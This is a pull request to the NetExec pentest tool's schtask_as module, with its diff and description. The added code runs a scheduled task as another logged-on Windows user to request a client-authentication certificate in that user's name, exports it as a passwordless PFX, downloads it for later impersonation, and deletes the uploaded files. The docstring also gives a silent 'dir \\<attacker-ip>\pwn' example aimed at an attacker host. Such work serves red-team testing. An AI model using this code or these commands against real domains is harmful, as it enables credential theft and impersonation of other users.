### PR TITLE
Add certificate request options to schtask_as

### DIFF
--- a/nxc/modules/schtask_as.py
+++ b/nxc/modules/schtask_as.py
@@ -1,6 +1,11 @@
 import os
+from time import sleep
+from io import BytesIO
+from textwrap import dedent
+from nxc.paths import TMP_PATH
 from traceback import format_exc
 from nxc.helpers.misc import CATEGORY
+from nxc.helpers.misc import gen_random_string
 from nxc.protocols.smb.atexec import TSCH_EXEC
 
 
@@ -11,6 +16,7 @@ class NXCModule:
     Modified by @Defte_ so that output on multiples lines are printed correctly (28/04/2025)
     Modified by @Defte_ so that we can upload a custom binary to execute using the BINARY option (28/04/2025)
     Modified by @SGMG11 to execute the task without output
+    Modified by @Defte_ to add certificate request on behalf of someone options
     """
     name = "schtask_as"
     description = "Remotely execute a scheduled task as a logged on user"
@@ -26,12 +32,15 @@ class NXCModule:
         FILE           OPTIONAL: Set a name for the command output file
         LOCATION       OPTIONAL: Set a location for the command output file (e.g. 'C:\\Windows\\Temp\\')
         SILENTCOMMAND  OPTIONAL: Do not retrieve output
+        CA             OPTIONAL: Set the Certificate Authority name to ask the certificate from (i.e: SERVER\CA_NAME)
+        TEMPLATE       OPTIONAL: Set the name of the template to request a certificate from
 
         Example:
         -------
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD=whoami
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD='bin.exe --option' BINARY=bin.exe
         nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD='dir \\<attacker-ip>\pwn' TASK='Legit Task' SILENTCOMMAND='True'
+        nxc smb <ip> -u <user> -p <password> -M schtask_as -o USER=Administrator CMD=certreq CA='ADCS\whiteflag-ADCS-CA' TEMPLATE=User
         """
         self.command_to_run = self.binary_to_upload = self.run_task_as = self.task_name = self.output_filename = self.output_file_location = self.time = None
         self.share = "C$"
@@ -61,12 +70,88 @@ class NXCModule:
         if "SILENTCOMMAND" in module_options and module_options["SILENTCOMMAND"] in ["True", "yes", "1"]:
             self.show_output = False
 
+        if "CA" in module_options:
+            self.ca_name = module_options["CA"]
+
+        if "TEMPLATE" in module_options:
+            self.template_name = module_options["TEMPLATE"]
+
     def on_admin_login(self, context, connection):
         self.logger = context.log
 
         if self.command_to_run is None:
             self.logger.fail("You need to specify a CMD to run")
             return
+
+        if self.command_to_run.lower() == "certreq":
+            if self.ca_name is None:
+                self.logger.fail("CertReq requires the CA name in the following format: SERVER_NAME\\CertificateAuthority_Name")
+                return
+
+            if self.template_name is None:
+                self.logger.fail("CertReq requires the template to request a certificate from")
+                return
+
+            tmp_share = self.share.replace("$", ":")
+            random_file_prefix = gen_random_string(10)
+
+            batch_file = BytesIO(dedent(f"""
+            @echo off
+            setlocal enabledelayedexpansion
+
+            certreq -new {tmp_share}\\{self.tmp_path}\\{random_file_prefix}.inf {tmp_share}\\{self.tmp_path}\\{random_file_prefix}.req > nul
+            certreq -submit -config {self.ca_name} {tmp_share}\\{self.tmp_path}\\{random_file_prefix}.req {tmp_share}\\{self.tmp_path}\\{random_file_prefix}.cer > nul
+
+            set "HASH="
+
+            for /f "usebackq tokens=* delims=" %%L in (`certreq -accept {tmp_share}\\{self.tmp_path}\\{random_file_prefix}.cer`) do (
+                set "line=%%L"
+
+                for /f "tokens=2* delims=:" %%X in ("!line!") do (
+                    set "candidate=%%X"
+                    set "candidate=!candidate:~1!"
+                    echo !candidate! | findstr /R "^[0-9A-Fa-f][0-9A-Fa-f]*" > nul
+                    if not errorlevel 1 (
+                        if "!candidate:~40!"=="" (
+                            set "HASH=!candidate!"
+                            certutil -user -exportPFX -p "" !HASH! {tmp_share}\\{self.tmp_path}\\{random_file_prefix}.pfx > nul
+                        )
+                    )
+                )
+            )
+            """).encode())
+            connection.conn.putFile(self.share, f"{self.tmp_path}\\{random_file_prefix}.bat", batch_file.read)
+            self.logger.success("Upload batch file successfully")
+
+            inf_file = BytesIO(dedent(f"""
+            [Version]
+            Signature="$Windows NT$"
+
+            [NewRequest]
+            Subject = "CN={self.run_task_as}"
+            KeySpec = 1
+            KeyLength = 2048
+            Exportable = TRUE
+            MachineKeySet = FALSE
+            SMIME = FALSE
+            PrivateKeyArchive = FALSE
+            UserProtected = FALSE
+            UseExistingKeySet = FALSE
+            ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
+            ProviderType = 12
+            RequestType = PKCS10
+            KeyUsage = 0xa0
+
+            [EnhancedKeyUsageExtension]
+            OID=1.3.6.1.5.5.7.3.2
+
+            [RequestAttributes]
+            CertificateTemplate = {self.template_name}
+            """).encode())
+            connection.conn.putFile(self.share, f"{self.tmp_path}\\{random_file_prefix}.inf", inf_file.read)
+            self.logger.success("Upload INF file successfully")
+
+            self.command_to_run = f"{tmp_share}\\{self.tmp_path}\\{random_file_prefix}.bat"
 
         if self.run_task_as is None:
             self.logger.fail("You need to specify a USER to run the command as")
@@ -137,3 +222,20 @@ class NXCModule:
                     context.log.success(f"Binary {binary_file_location}{self.binary_to_upload_name} successfully deleted")
                 except Exception as e:
                     context.log.fail(f"Error deleting {binary_file_location}{self.binary_to_upload_name} on {self.share}: {e}")
+
+            if self.ca_name and self.template_name:
+                # Just waiting a bit for the pfx file to be correctly dumped
+                sleep(2)
+                with open(os.path.join(TMP_PATH, f"{self.run_task_as}.pfx"), "wb+") as dump_file:
+                    try:
+                        connection.conn.getFile(self.share, f"{self.tmp_path}\\{random_file_prefix}.pfx", dump_file.write)
+                        context.log.success(f"PFX file stored in {TMP_PATH}/{self.run_task_as}.pfx")
+                    except Exception as e:
+                        context.log.fail(f"Error while get {self.tmp_path}\\{random_file_prefix}.pfx: {e}")
+
+                for ext in [".bat", ".inf", ".cer", ".pfx", ".req", ".rsp"]:
+                    try:
+                        connection.conn.deleteFile(self.share, f"{self.tmp_path}\\{random_file_prefix}{ext}")
+                        context.log.success(f"Successfully deleted {self.tmp_path}\\{random_file_prefix}{ext}")
+                    except Exception as e:
+                        context.log.fail(f"Couldn't delete {self.tmp_path}\\{random_file_prefix}{ext} : {e}")


### PR DESCRIPTION
This PR adds options to the schtask_as module to request certificate on behalf of a loggedon users. Below is the command to use:

```sh
netexec.py smb IP -u user -p  pass -M schtask_as -o USER='WHITEFLAG\Administrateur' CMD=certreq CA='ADCS\whiteflag-ADCS-CA' TEMPLATE="User"
```

This will upload two files:
- random.bat which contains the certreq commands
- random.inf which is the configuration file used by certreq 

Here is the output:

<img width="1127" height="240" alt="image" src="https://github.com/user-attachments/assets/0b73b82f-92cd-4587-b90e-b66339e72fdb" />

PFX file is stored in TMP_PATH and can be used with certipy or nxc itself to authenticate via the PFX (schannel or PKINIT):

<img width="1174" height="179" alt="image" src="https://github.com/user-attachments/assets/9f13f7f4-5c54-4762-946d-10e83cc70702" />

Then all files (.bat, .inf and intermediate files) are deleted from the remote system (may be we can hide the multiple successfully deleted ... or switch to context.debug tho).

